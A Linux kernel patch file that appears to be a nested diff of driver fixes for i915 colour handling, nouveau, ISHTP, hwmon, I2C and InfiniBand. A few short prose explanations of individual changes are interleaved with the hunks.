+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index 85a38d794dd9f..c9c9af7956387 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -516,6 +516,14 @@ static void ilk_lut_12p4_pack(struct drm_color_lut *entry, u32 ldw, u32 udw)
+ 
+ static void icl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ {
++	/*
++	 * Despite Wa_1406463849, ICL no longer suffers from the SKL
++	 * DC5/PSR CSC black screen issue (see skl_color_commit_noarm()).
++	 * Possibly due to the extra sticky CSC arming
++	 * (see icl_color_post_update()).
++	 *
++	 * On TGL+ all CSC arming issues have been properly fixed.
++	 */
+ 	icl_load_csc_matrix(crtc_state);
+ }
+ 
+@@ -617,6 +625,28 @@ static void icl_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 			  crtc_state->csc_mode);
+ }
+ 
++static void icl_color_post_update(const struct intel_crtc_state *crtc_state)
++{
++	struct intel_crtc *crtc = to_intel_crtc(crtc_state->uapi.crtc);
++	struct drm_i915_private *i915 = to_i915(crtc->base.dev);
++
++	/*
++	 * Despite Wa_1406463849, ICL CSC is no longer disarmed by
++	 * coeff/offset register *writes*. Instead, once CSC_MODE
++	 * is armed it stays armed, even after it has been latched.
++	 * Afterwards the coeff/offset registers become effectively
++	 * self-arming. That self-arming must be disabled before the
++	 * next icl_color_commit_noarm() tries to write the next set
++	 * of coeff/offset registers. Fortunately register *reads*
++	 * do still disarm the CSC. Naturally this must not be done
++	 * until the previously written CSC registers have actually
++	 * been latched.
++	 *
++	 * TGL+ no longer need this workaround.
++	 */
++	intel_de_read_fw(i915, PIPE_CSC_PREOFF_HI(crtc->pipe));
++}
++
+ static struct drm_property_blob *
+ create_linear_lut(struct drm_i915_private *i915, int lut_size)
+ {
+@@ -2345,10 +2375,19 @@ static const struct intel_color_funcs i9xx_color_funcs = {
+ 	.read_luts = i9xx_read_luts,
+ };
+ 
++static const struct intel_color_funcs tgl_color_funcs = {
++	.color_check = icl_color_check,
++	.color_commit_noarm = icl_color_commit_noarm,
++	.color_commit_arm = icl_color_commit_arm,
++	.load_luts = icl_load_luts,
++	.read_luts = icl_read_luts,
++};
++
+ static const struct intel_color_funcs icl_color_funcs = {
+ 	.color_check = icl_color_check,
+ 	.color_commit_noarm = icl_color_commit_noarm,
+ 	.color_commit_arm = icl_color_commit_arm,
++	.color_post_update = icl_color_post_update,
+ 	.load_luts = icl_load_luts,
+ 	.read_luts = icl_read_luts,
+ };
+@@ -2440,7 +2479,9 @@ void intel_color_init_hooks(struct drm_i915_private *i915)
+ 		else
+ 			i915->display.funcs.color = &i9xx_color_funcs;
+ 	} else {
+-		if (DISPLAY_VER(i915) >= 11)
++		if (DISPLAY_VER(i915) >= 12)
++			i915->display.funcs.color = &tgl_color_funcs;
++		else if (DISPLAY_VER(i915) == 11)
+ 			i915->display.funcs.color = &icl_color_funcs;
+ 		else if (DISPLAY_VER(i915) == 10)
+ 			i915->display.funcs.color = &glk_color_funcs;
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gf108.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gf108.c
+index 76678dd60f93f..c4c6f67af7ccc 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gf108.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gf108.c
+@@ -31,6 +31,7 @@ gf108_fb = {
+ 	.init = gf100_fb_init,
+ 	.init_page = gf100_fb_init_page,
+ 	.intr = gf100_fb_intr,
++	.sysmem.flush_page_init = gf100_fb_sysmem_flush_page_init,
+ 	.ram_new = gf108_ram_new,
+ 	.default_bigpage = 17,
+ };
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk104.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk104.c
+index f73442ccb424b..433fa966ba231 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk104.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk104.c
+@@ -77,6 +77,7 @@ gk104_fb = {
+ 	.init = gf100_fb_init,
+ 	.init_page = gf100_fb_init_page,
+ 	.intr = gf100_fb_intr,
++	.sysmem.flush_page_init = gf100_fb_sysmem_flush_page_init,
+ 	.ram_new = gk104_ram_new,
+ 	.default_bigpage = 17,
+ 	.clkgate_pack = gk104_fb_clkgate_pack,
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk110.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk110.c
+index 45d6cdffafeed..4dc283dedf8b5 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk110.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gk110.c
+@@ -59,6 +59,7 @@ gk110_fb = {
+ 	.init = gf100_fb_init,
+ 	.init_page = gf100_fb_init_page,
+ 	.intr = gf100_fb_intr,
++	.sysmem.flush_page_init = gf100_fb_sysmem_flush_page_init,
+ 	.ram_new = gk104_ram_new,
+ 	.default_bigpage = 17,
+ 	.clkgate_pack = gk110_fb_clkgate_pack,
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gm107.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gm107.c
+index de52462a92bf0..90bfff616d35b 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gm107.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gm107.c
+@@ -31,6 +31,7 @@ gm107_fb = {
+ 	.init = gf100_fb_init,
+ 	.init_page = gf100_fb_init_page,
+ 	.intr = gf100_fb_intr,
++	.sysmem.flush_page_init = gf100_fb_sysmem_flush_page_init,
+ 	.ram_new = gm107_ram_new,
+ 	.default_bigpage = 17,
+ };
+diff --git a/drivers/hid/intel-ish-hid/ishtp/bus.c b/drivers/hid/intel-ish-hid/ishtp/bus.c
+index f68aba8794fe5..d4296681cf720 100644
+--- a/drivers/hid/intel-ish-hid/ishtp/bus.c
++++ b/drivers/hid/intel-ish-hid/ishtp/bus.c
+@@ -241,8 +241,8 @@ static int ishtp_cl_bus_match(struct device *dev, struct device_driver *drv)
+ 	struct ishtp_cl_device *device = to_ishtp_cl_device(dev);
+ 	struct ishtp_cl_driver *driver = to_ishtp_cl_driver(drv);
+ 
+-	return guid_equal(&driver->id[0].guid,
+-			  &device->fw_client->props.protocol_name);
++	return device->fw_client ? guid_equal(&driver->id[0].guid,
++		&device->fw_client->props.protocol_name) : 0;
+ }
+ 
+ /**
+diff --git a/drivers/hwmon/peci/cputemp.c b/drivers/hwmon/peci/cputemp.c
+index 30850a479f61f..87d56f0fc888c 100644
+--- a/drivers/hwmon/peci/cputemp.c
++++ b/drivers/hwmon/peci/cputemp.c
+@@ -537,6 +537,12 @@ static const struct cpu_info cpu_hsx = {
+ 	.thermal_margin_to_millidegree = &dts_eight_dot_eight_to_millidegree,
+ };
+ 
++static const struct cpu_info cpu_skx = {
++	.reg		= &resolved_cores_reg_hsx,
++	.min_peci_revision = 0x33,
++	.thermal_margin_to_millidegree = &dts_ten_dot_six_to_millidegree,
++};
++
+ static const struct cpu_info cpu_icx = {
+ 	.reg		= &resolved_cores_reg_icx,
+ 	.min_peci_revision = 0x40,
+@@ -558,7 +564,7 @@ static const struct auxiliary_device_id peci_cputemp_ids[] = {
+ 	},
+ 	{
+ 		.name = "peci_cpu.cputemp.skx",
+-		.driver_data = (kernel_ulong_t)&cpu_hsx,
++		.driver_data = (kernel_ulong_t)&cpu_skx,
+ 	},
+ 	{
+ 		.name = "peci_cpu.cputemp.icx",
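The new cpu_skx entry matters because Skylake reports its thermal margin in a different fixed-point format than Haswell: the helper names suggest 10.6 (six fractional bits, divide by 64) versus 8.8 (divide by 256). Assuming that usual reading of the N.M naming, a worked example:

	/* 10.6 fixed point, 6 fractional bits -> divide by 64:
	 * raw 0x0320 = 800  ->  800 * 1000 / 64 = 12500 millidegrees (12.5 C)
	 * The 8.8 decode used by cpu_hsx would divide by 256 instead.
	 */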
+diff --git a/drivers/hwmon/xgene-hwmon.c b/drivers/hwmon/xgene-hwmon.c
+index d1abea49f01be..78d9f52e2a719 100644
+--- a/drivers/hwmon/xgene-hwmon.c
++++ b/drivers/hwmon/xgene-hwmon.c
+@@ -698,14 +698,14 @@ static int xgene_hwmon_probe(struct platform_device *pdev)
+ 		ctx->comm_base_addr = pcc_chan->shmem_base_addr;
+ 		if (ctx->comm_base_addr) {
+ 			if (version == XGENE_HWMON_V2)
+-				ctx->pcc_comm_addr = (void __force *)ioremap(
+-							ctx->comm_base_addr,
+-							pcc_chan->shmem_size);
++				ctx->pcc_comm_addr = (void __force *)devm_ioremap(&pdev->dev,
++								  ctx->comm_base_addr,
++								  pcc_chan->shmem_size);
+ 			else
+-				ctx->pcc_comm_addr = memremap(
+-							ctx->comm_base_addr,
+-							pcc_chan->shmem_size,
+-							MEMREMAP_WB);
++				ctx->pcc_comm_addr = devm_memremap(&pdev->dev,
++								   ctx->comm_base_addr,
++								   pcc_chan->shmem_size,
++								   MEMREMAP_WB);
+ 		} else {
+ 			dev_err(&pdev->dev, "Failed to get PCC comm region\n");
+ 			rc = -ENODEV;
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index f5c37d2f536bc..e067671b3ce2e 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -316,6 +316,13 @@ static void hisi_i2c_xfer_msg(struct hisi_i2c_controller *ctlr)
+ 		    max_write == 0)
+ 			break;
+ 	}
++
++	/*
++	 * Disable the TX_EMPTY interrupt after finishing all the messages to
++	 * avoid overwhelming the CPU.
++	 */
++	if (ctlr->msg_tx_idx == ctlr->msg_num)
++		hisi_i2c_disable_int(ctlr, HISI_I2C_INT_TX_EMPTY);
+ }
+ 
+ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index 9b2f9544c5681..a49b14d52a986 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -463,6 +463,8 @@ static int lpi2c_imx_xfer(struct i2c_adapter *adapter,
+ 		if (num == 1 && msgs[0].len == 0)
+ 			goto stop;
+ 
++		lpi2c_imx->rx_buf = NULL;
++		lpi2c_imx->tx_buf = NULL;
+ 		lpi2c_imx->delivered = 0;
+ 		lpi2c_imx->msglen = msgs[i].len;
+ 		init_completion(&lpi2c_imx->complete);
+diff --git a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+index 09af759211478..b21ffd6df9276 100644
+--- a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
++++ b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+@@ -48,9 +48,9 @@
+  * SR_HOLD_TIME_XK_TICKS field will indicate the number of ticks of the
+  * baud clock required to program 'Hold Time' at X KHz.
+  */
+-#define SR_HOLD_TIME_100K_TICKS	133
+-#define SR_HOLD_TIME_400K_TICKS	20
+-#define SR_HOLD_TIME_1000K_TICKS	11
++#define SR_HOLD_TIME_100K_TICKS		150
++#define SR_HOLD_TIME_400K_TICKS		20
++#define SR_HOLD_TIME_1000K_TICKS	12
+ 
+ #define SMB_CORE_COMPLETION_REG_OFF3	(SMBUS_MAST_CORE_ADDR_BASE + 0x23)
+ 
+@@ -65,17 +65,17 @@
+  * the baud clock required to program 'fair idle delay' at X KHz. Fair idle
+  * delay establishes the MCTP T(IDLE_DELAY) period.
+  */
+-#define FAIR_BUS_IDLE_MIN_100K_TICKS		969
+-#define FAIR_BUS_IDLE_MIN_400K_TICKS		157
+-#define FAIR_BUS_IDLE_MIN_1000K_TICKS		157
++#define FAIR_BUS_IDLE_MIN_100K_TICKS		992
++#define FAIR_BUS_IDLE_MIN_400K_TICKS		500
++#define FAIR_BUS_IDLE_MIN_1000K_TICKS		500
+ 
+ /*
+  * FAIR_IDLE_DELAY_XK_TICKS field will indicate the number of ticks of the
+  * baud clock required to satisfy the fairness protocol at X KHz.
+  */
+-#define FAIR_IDLE_DELAY_100K_TICKS	1000
+-#define FAIR_IDLE_DELAY_400K_TICKS	500
+-#define FAIR_IDLE_DELAY_1000K_TICKS	500
++#define FAIR_IDLE_DELAY_100K_TICKS	963
++#define FAIR_IDLE_DELAY_400K_TICKS	156
++#define FAIR_IDLE_DELAY_1000K_TICKS	156
+ 
+ #define SMB_IDLE_SCALING_100K		\
+ 	((FAIR_IDLE_DELAY_100K_TICKS << 16) | FAIR_BUS_IDLE_MIN_100K_TICKS)
+@@ -105,7 +105,7 @@
+  */
+ #define BUS_CLK_100K_LOW_PERIOD_TICKS		156
+ #define BUS_CLK_400K_LOW_PERIOD_TICKS		41
+-#define BUS_CLK_1000K_LOW_PERIOD_TICKS	15
++#define BUS_CLK_1000K_LOW_PERIOD_TICKS		15
+ 
+ /*
+  * BUS_CLK_XK_HIGH_PERIOD_TICKS field defines the number of I2C Baud Clock
+@@ -131,7 +131,7 @@
+  */
+ #define CLK_SYNC_100K			4
+ #define CLK_SYNC_400K			4
+-#define CLK_SYNC_1000K		4
++#define CLK_SYNC_1000K			4
+ 
+ #define SMB_CORE_DATA_TIMING_REG_OFF	(SMBUS_MAST_CORE_ADDR_BASE + 0x40)
+ 
+@@ -142,25 +142,25 @@
+  * determines the SCLK hold time following SDAT driven low during the first
+  * START bit in a transfer.
+  */
+-#define FIRST_START_HOLD_100K_TICKS	22
+-#define FIRST_START_HOLD_400K_TICKS	16
+-#define FIRST_START_HOLD_1000K_TICKS	6
++#define FIRST_START_HOLD_100K_TICKS	23
++#define FIRST_START_HOLD_400K_TICKS	8
++#define FIRST_START_HOLD_1000K_TICKS	12
+ 
+ /*
+  * STOP_SETUP_XK_TICKS will indicate the number of ticks of the baud clock
+  * required to program 'STOP_SETUP' timer at X KHz. This timer determines the
+  * SDAT setup time from the rising edge of SCLK for a STOP condition.
+  */
+-#define STOP_SETUP_100K_TICKS		157
++#define STOP_SETUP_100K_TICKS		150
+ #define STOP_SETUP_400K_TICKS		20
+-#define STOP_SETUP_1000K_TICKS	12
++#define STOP_SETUP_1000K_TICKS		12
+ 
+ /*
+  * RESTART_SETUP_XK_TICKS will indicate the number of ticks of the baud clock
+  * required to program 'RESTART_SETUP' timer at X KHz. This timer determines the
+  * SDAT setup time from the rising edge of SCLK for a repeated START condition.
+  */
+-#define RESTART_SETUP_100K_TICKS	157
++#define RESTART_SETUP_100K_TICKS	156
+ #define RESTART_SETUP_400K_TICKS	20
+ #define RESTART_SETUP_1000K_TICKS	12
+ 
+@@ -169,7 +169,7 @@
+  * required to program 'DATA_HOLD' timer at X KHz. This timer determines the
+  * SDAT hold time following SCLK driven low.
+  */
+-#define DATA_HOLD_100K_TICKS		2
++#define DATA_HOLD_100K_TICKS		12
+ #define DATA_HOLD_400K_TICKS		2
+ #define DATA_HOLD_1000K_TICKS		2
+ 
+@@ -190,35 +190,35 @@
+  * Bus Idle Minimum time = BUS_IDLE_MIN[7:0] x Baud_Clock_Period x
+  * (BUS_IDLE_MIN_XK_TICKS[7] ? 4,1)
+  */
+-#define BUS_IDLE_MIN_100K_TICKS		167UL
+-#define BUS_IDLE_MIN_400K_TICKS		139UL
+-#define BUS_IDLE_MIN_1000K_TICKS		133UL
++#define BUS_IDLE_MIN_100K_TICKS		36UL
++#define BUS_IDLE_MIN_400K_TICKS		10UL
++#define BUS_IDLE_MIN_1000K_TICKS	4UL
+ 
+ /*
+  * CTRL_CUM_TIME_OUT_XK_TICKS defines SMBus Controller Cumulative Time-Out.
+  * SMBus Controller Cumulative Time-Out duration =
+  * CTRL_CUM_TIME_OUT_XK_TICKS[7:0] x Baud_Clock_Period x 2048
+  */
+-#define CTRL_CUM_TIME_OUT_100K_TICKS		159
+-#define CTRL_CUM_TIME_OUT_400K_TICKS		159
+-#define CTRL_CUM_TIME_OUT_1000K_TICKS		159
++#define CTRL_CUM_TIME_OUT_100K_TICKS		76
++#define CTRL_CUM_TIME_OUT_400K_TICKS		76
++#define CTRL_CUM_TIME_OUT_1000K_TICKS		76
+ 
+ /*
+  * TARGET_CUM_TIME_OUT_XK_TICKS defines SMBus Target Cumulative Time-Out duration.
+  * SMBus Target Cumulative Time-Out duration = TARGET_CUM_TIME_OUT_XK_TICKS[7:0] x
+  * Baud_Clock_Period x 4096
+  */
+-#define TARGET_CUM_TIME_OUT_100K_TICKS	199
+-#define TARGET_CUM_TIME_OUT_400K_TICKS	199
+-#define TARGET_CUM_TIME_OUT_1000K_TICKS	199
++#define TARGET_CUM_TIME_OUT_100K_TICKS	95
++#define TARGET_CUM_TIME_OUT_400K_TICKS	95
++#define TARGET_CUM_TIME_OUT_1000K_TICKS	95
+ 
+ /*
+  * CLOCK_HIGH_TIME_OUT_XK defines Clock High time out period.
+  * Clock High time out period = CLOCK_HIGH_TIME_OUT_XK[7:0] x Baud_Clock_Period x 8
+  */
+-#define CLOCK_HIGH_TIME_OUT_100K_TICKS	204
+-#define CLOCK_HIGH_TIME_OUT_400K_TICKS	204
+-#define CLOCK_HIGH_TIME_OUT_1000K_TICKS	204
++#define CLOCK_HIGH_TIME_OUT_100K_TICKS	97
++#define CLOCK_HIGH_TIME_OUT_400K_TICKS	97
++#define CLOCK_HIGH_TIME_OUT_1000K_TICKS	97
+ 
+ #define TO_SCALING_100K		\
+ 	((BUS_IDLE_MIN_100K_TICKS << 24) | (CTRL_CUM_TIME_OUT_100K_TICKS << 16) | \
+diff --git a/drivers/i2c/busses/i2c-ocores.c b/drivers/i2c/busses/i2c-ocores.c
+index a0af027db04c1..2e575856c5cd5 100644
+--- a/drivers/i2c/busses/i2c-ocores.c
++++ b/drivers/i2c/busses/i2c-ocores.c
+@@ -342,18 +342,18 @@ static int ocores_poll_wait(struct ocores_i2c *i2c)
+  * ocores_isr(), we just add our polling code around it.
+  *
+  * It can run in atomic context
++ *
++ * Return: 0 on success, -ETIMEDOUT on timeout
+  */
+-static void ocores_process_polling(struct ocores_i2c *i2c)
++static int ocores_process_polling(struct ocores_i2c *i2c)
+ {
+-	while (1) {
+-		irqreturn_t ret;
+-		int err;
++	irqreturn_t ret;
++	int err = 0;
+ 
++	while (1) {
+ 		err = ocores_poll_wait(i2c);
+-		if (err) {
+-			i2c->state = STATE_ERROR;
++		if (err)
+ 			break; /* timeout */
+-		}
+ 
+ 		ret = ocores_isr(-1, i2c);
+ 		if (ret == IRQ_NONE)
+@@ -364,13 +364,15 @@ static void ocores_process_polling(struct ocores_i2c *i2c)
+ 					break;
+ 		}
+ 	}
++
++	return err;
+ }
+ 
+ static int ocores_xfer_core(struct ocores_i2c *i2c,
+ 			    struct i2c_msg *msgs, int num,
+ 			    bool polling)
+ {
+-	int ret;
++	int ret = 0;
+ 	u8 ctrl;
+ 
+ 	ctrl = oc_getreg(i2c, OCI2C_CONTROL);
+@@ -388,15 +390,16 @@ static int ocores_xfer_core(struct ocores_i2c *i2c,
+ 	oc_setreg(i2c, OCI2C_CMD, OCI2C_CMD_START);
+ 
+ 	if (polling) {
+-		ocores_process_polling(i2c);
++		ret = ocores_process_polling(i2c);
+ 	} else {
+-		ret = wait_event_timeout(i2c->wait,
+-					 (i2c->state == STATE_ERROR) ||
+-					 (i2c->state == STATE_DONE), HZ);
+-		if (ret == 0) {
+-			ocores_process_timeout(i2c);
+-			return -ETIMEDOUT;
+-		}
++		if (wait_event_timeout(i2c->wait,
++				       (i2c->state == STATE_ERROR) ||
++				       (i2c->state == STATE_DONE), HZ) == 0)
++			ret = -ETIMEDOUT;
++	}
++	if (ret) {
++		ocores_process_timeout(i2c);
++		return ret;
+ 	}
+ 
+ 	return (i2c->state == STATE_DONE) ? num : -EIO;
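After the ocores refactor both completion paths funnel into one error variable: polling now returns -ETIMEDOUT from ocores_process_polling() instead of silently flipping the state machine to STATE_ERROR, and the interrupt path sets the same code, so a single ocores_process_timeout() call handles recovery. The resulting control flow, condensed from the hunk:

	if (polling)
		ret = ocores_process_polling(i2c);
	else if (wait_event_timeout(i2c->wait,
				    (i2c->state == STATE_ERROR) ||
				    (i2c->state == STATE_DONE), HZ) == 0)
		ret = -ETIMEDOUT;
	if (ret) {
		ocores_process_timeout(i2c);	/* one shared recovery path */
		return ret;
	}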
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 7e508b15e7761..00c9529c3143f 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -624,22 +624,11 @@ static inline unsigned short cma_family(struct rdma_id_private *id_priv)
+ 	return id_priv->id.route.addr.src_addr.ss_family;
+ }
+ 
+-static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
++static int cma_set_default_qkey(struct rdma_id_private *id_priv)
+ {
+ 	struct ib_sa_mcmember_rec rec;
+ 	int ret = 0;
+ 
+-	if (id_priv->qkey) {
+-		if (qkey && id_priv->qkey != qkey)
+-			return -EINVAL;
+-		return 0;
+-	}
+-
+-	if (qkey) {
+-		id_priv->qkey = qkey;
+-		return 0;
+-	}
+-
+ 	switch (id_priv->id.ps) {
+ 	case RDMA_PS_UDP:
+ 	case RDMA_PS_IB:
+@@ -659,6 +648,16 @@ static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
+ 	return ret;
+ }
+ 
++static int cma_set_qkey(struct rdma_id_private *id_priv, u32 qkey)
++{
++	if (!qkey ||
++	    (id_priv->qkey && (id_priv->qkey != qkey)))
++		return -EINVAL;
++
++	id_priv->qkey = qkey;
++	return 0;
++}
++
+ static void cma_translate_ib(struct sockaddr_ib *sib, struct rdma_dev_addr *dev_addr)
+ {
+ 	dev_addr->dev_type = ARPHRD_INFINIBAND;
+@@ -1229,7 +1228,7 @@ static int cma_ib_init_qp_attr(struct rdma_id_private *id_priv,
+ 	*qp_attr_mask = IB_QP_STATE | IB_QP_PKEY_INDEX | IB_QP_PORT;
+ 
+ 	if (id_priv->id.qp_type == IB_QPT_UD) {
+-		ret = cma_set_qkey(id_priv, 0);
++		ret = cma_set_default_qkey(id_priv);
+ 		if (ret)
+ 			return ret;
+ 
+@@ -4558,7 +4557,10 @@ static int cma_send_sidr_rep(struct rdma_id_private *id_priv,
+ 	memset(&rep, 0, sizeof rep);
+ 	rep.status = status;
+ 	if (status == IB_SIDR_SUCCESS) {
+-		ret = cma_set_qkey(id_priv, qkey);
++		if (qkey)
++			ret = cma_set_qkey(id_priv, qkey);
++		else
++			ret = cma_set_default_qkey(id_priv);
+ 		if (ret)
+ 			return ret;
+ 		rep.qp_num = id_priv->qp_num;
+@@ -4763,9 +4765,7 @@ static void cma_make_mc_event(int status, struct rdma_id_private *id_priv,
+ 	enum ib_gid_type gid_type;
+ 	struct net_device *ndev;
+ 
+-	if (!status)
+-		status = cma_set_qkey(id_priv, be32_to_cpu(multicast->rec.qkey));
+-	else
++	if (status)
+ 		pr_debug_ratelimited("RDMA CM: MULTICAST_ERROR: failed to join multicast. status %d\n",
+ 				     status);
+ 
+@@ -4793,7 +4793,7 @@ static void cma_make_mc_event(int status, struct rdma_id_private *id_priv,
+ 	}
+ 
+ 	event->param.ud.qp_num = 0xFFFFFF;
+-	event->param.ud.qkey = be32_to_cpu(multicast->rec.qkey);
++	event->param.ud.qkey = id_priv->qkey;
+ 
+ out:
+ 	if (ndev)
+@@ -4812,8 +4812,11 @@ static int cma_ib_mc_handler(int status, struct ib_sa_multicast *multicast)
+ 	    READ_ONCE(id_priv->state) == RDMA_CM_DESTROYING)
+ 		goto out;
+ 
+-	cma_make_mc_event(status, id_priv, multicast, &event, mc);
+-	ret = cma_cm_event_handler(id_priv, &event);
++	ret = cma_set_qkey(id_priv, be32_to_cpu(multicast->rec.qkey));
++	if (!ret) {
++		cma_make_mc_event(status, id_priv, multicast, &event, mc);
++		ret = cma_cm_event_handler(id_priv, &event);
++	}
+ 	rdma_destroy_ah_attr(&event.param.ud.ah_attr);
+ 	WARN_ON(ret);
+ 
+@@ -4866,9 +4869,11 @@ static int cma_join_ib_multicast(struct rdma_id_private *id_priv,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = cma_set_qkey(id_priv, 0);
+-	if (ret)
+-		return ret;
++	if (!id_priv->qkey) {
++		ret = cma_set_default_qkey(id_priv);
++		if (ret)
++			return ret;
++	}
+ 
+ 	cma_set_mgid(id_priv, (struct sockaddr *) &mc->addr, &rec.mgid);
+ 	rec.qkey = cpu_to_be32(id_priv->qkey);
+@@ -4945,9 +4950,6 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	cma_iboe_set_mgid(addr, &ib.rec.mgid, gid_type);
+ 
+ 	ib.rec.pkey = cpu_to_be16(0xffff);
+-	if (id_priv->id.ps == RDMA_PS_UDP)
+-		ib.rec.qkey = cpu_to_be32(RDMA_UDP_QKEY);
+-
+ 	if (dev_addr->bound_dev_if)
+ 		ndev = dev_get_by_index(dev_addr->net, dev_addr->bound_dev_if);
+ 	if (!ndev)
+@@ -4973,6 +4975,9 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	if (err || !ib.rec.mtu)
+ 		return err ?: -EINVAL;
+ 
++	if (!id_priv->qkey)
++		cma_set_default_qkey(id_priv);
++
+ 	rdma_ip2gid((struct sockaddr *)&id_priv->id.route.addr.src_addr,
+ 		    &ib.rec.port_gid);
+ 	INIT_WORK(&mc->iboe_join.work, cma_iboe_join_work_handler);
+@@ -4998,6 +5003,9 @@ int rdma_join_multicast(struct rdma_cm_id *id, struct sockaddr *addr,
+ 			    READ_ONCE(id_priv->state) != RDMA_CM_ADDR_RESOLVED))
+ 		return -EINVAL;
+ 
++	if (id_priv->id.qp_type != IB_QPT_UD)
++		return -EINVAL;
++
+ 	mc = kzalloc(sizeof(*mc), GFP_KERNEL);
+ 	if (!mc)
+ 		return -ENOMEM;
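The qkey rework above separates two previously entangled policies: cma_set_qkey() now only accepts an explicit non-zero qkey and fails on a mismatch with one already recorded, while cma_set_default_qkey() derives the per-port-space default (e.g. RDMA_UDP_QKEY for RDMA_PS_UDP). Call sites reduce to one pattern, sketched with names from the hunks:

	if (qkey)
		ret = cma_set_qkey(id_priv, qkey);	/* explicit: must match */
	else
		ret = cma_set_default_qkey(id_priv);	/* derive the default   */
	if (ret)
		return ret;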
+diff --git a/drivers/infiniband/core/verbs.c b/drivers/infiniband/core/verbs.c
+index 11b1c1603aeb4..b99b3cc283b65 100644
+--- a/drivers/infiniband/core/verbs.c
++++ b/drivers/infiniband/core/verbs.c
+@@ -532,6 +532,8 @@ static struct ib_ah *_rdma_create_ah(struct ib_pd *pd,
+ 	else
+ 		ret = device->ops.create_ah(ah, &init_attr, NULL);
+ 	if (ret) {
++		if (ah->sgid_attr)
++			rdma_put_gid_attr(ah->sgid_attr);
+ 		kfree(ah);
+ 		return ERR_PTR(ret);
+ 	}
+diff --git a/drivers/infiniband/hw/erdma/erdma_cq.c b/drivers/infiniband/hw/erdma/erdma_cq.c
+index cabd8678b3558..7bc354273d4ec 100644
+--- a/drivers/infiniband/hw/erdma/erdma_cq.c
++++ b/drivers/infiniband/hw/erdma/erdma_cq.c
+@@ -65,7 +65,7 @@ static const enum ib_wc_opcode wc_mapping_table[ERDMA_NUM_OPCODES] = {
+ 	[ERDMA_OP_LOCAL_INV] = IB_WC_LOCAL_INV,
+ 	[ERDMA_OP_READ_WITH_INV] = IB_WC_RDMA_READ,
+ 	[ERDMA_OP_ATOMIC_CAS] = IB_WC_COMP_SWAP,
+-	[ERDMA_OP_ATOMIC_FAD] = IB_WC_FETCH_ADD,
++	[ERDMA_OP_ATOMIC_FAA] = IB_WC_FETCH_ADD,
+ };
+ 
+ static const struct {
+diff --git a/drivers/infiniband/hw/erdma/erdma_hw.h b/drivers/infiniband/hw/erdma/erdma_hw.h
+index ab371fec610c3..8a8d4539a006b 100644
+--- a/drivers/infiniband/hw/erdma/erdma_hw.h
++++ b/drivers/infiniband/hw/erdma/erdma_hw.h
+@@ -441,7 +441,7 @@ struct erdma_reg_mr_sqe {
+ };
+ 
+ /* EQ related. */
+-#define ERDMA_DEFAULT_EQ_DEPTH 256
++#define ERDMA_DEFAULT_EQ_DEPTH 4096
+ 
+ /* ceqe */
+ #define ERDMA_CEQE_HDR_DB_MASK BIT_ULL(63)
+@@ -491,7 +491,7 @@ enum erdma_opcode {
+ 	ERDMA_OP_LOCAL_INV = 15,
+ 	ERDMA_OP_READ_WITH_INV = 16,
+ 	ERDMA_OP_ATOMIC_CAS = 17,
+-	ERDMA_OP_ATOMIC_FAD = 18,
++	ERDMA_OP_ATOMIC_FAA = 18,
+ 	ERDMA_NUM_OPCODES = 19,
+ 	ERDMA_OP_INVALID = ERDMA_NUM_OPCODES + 1
+ };
+diff --git a/drivers/infiniband/hw/erdma/erdma_main.c b/drivers/infiniband/hw/erdma/erdma_main.c
+index 5dc31e5df5cba..4a29a53a6652e 100644
+--- a/drivers/infiniband/hw/erdma/erdma_main.c
++++ b/drivers/infiniband/hw/erdma/erdma_main.c
+@@ -56,7 +56,7 @@ done:
+ static int erdma_enum_and_get_netdev(struct erdma_dev *dev)
+ {
+ 	struct net_device *netdev;
+-	int ret = -ENODEV;
++	int ret = -EPROBE_DEFER;
+ 
+ 	/* Already binded to a net_device, so we skip. */
+ 	if (dev->netdev)
+diff --git a/drivers/infiniband/hw/erdma/erdma_qp.c b/drivers/infiniband/hw/erdma/erdma_qp.c
+index d088d6bef431a..44923c51a01b4 100644
